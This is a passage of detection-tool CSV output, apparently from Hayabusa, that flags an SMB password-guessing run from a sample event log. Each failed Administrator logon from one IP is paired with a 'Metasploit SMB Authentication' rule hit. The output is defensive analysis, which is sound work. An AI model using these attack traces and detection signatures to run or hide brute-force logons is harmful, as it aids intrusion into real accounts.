SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: 
